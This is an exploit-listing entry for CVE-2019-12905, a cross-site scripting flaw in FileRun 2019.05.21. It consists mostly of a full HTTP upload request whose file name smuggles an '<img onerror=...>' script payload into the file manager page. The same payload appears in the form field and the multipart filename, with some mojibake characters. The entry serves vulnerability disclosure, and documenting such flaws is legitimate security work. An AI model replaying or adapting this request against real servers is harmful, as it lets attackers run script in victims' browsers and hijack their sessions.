# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting # Date: 2019-07-01 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://www.filerun.com/ # Software Link: https://filerun.com/download # Version: v2019.05.21 # Tested on: Windows/Linux # CVE: CVE-2019-12905 # CVE-2019-12905 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905 # https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3 # PoC To exploit vulnerability, someone could upload an allowed file named “><img src=x onerror=prompt(document.domain)> to impact users who open the page. POST /filerun/?module=fileman&section=do&page=up HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://172.16.191.129/filerun/ Content-Type: multipart/form-data; boundary=---------------------------142096305821079611661465592403 Content-Length: 6034 DNT: 1 Connection: close Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowTotalSize" 5100 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsFirstChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowIsLastChunk" 1 -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="flowFilename" â��><img src=x onerror=prompt(document.domain)>.jpg -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="path" /ROOT/HOME -----------------------------142096305821079611661465592403 Content-Disposition: form-data; name="file"; filename="â��><img src=x onerror=prompt(document.domain)>.jpg" Content-Type: image/jpg <%@ I said you should learn! %> -----------------------------142096305821079611661465592403--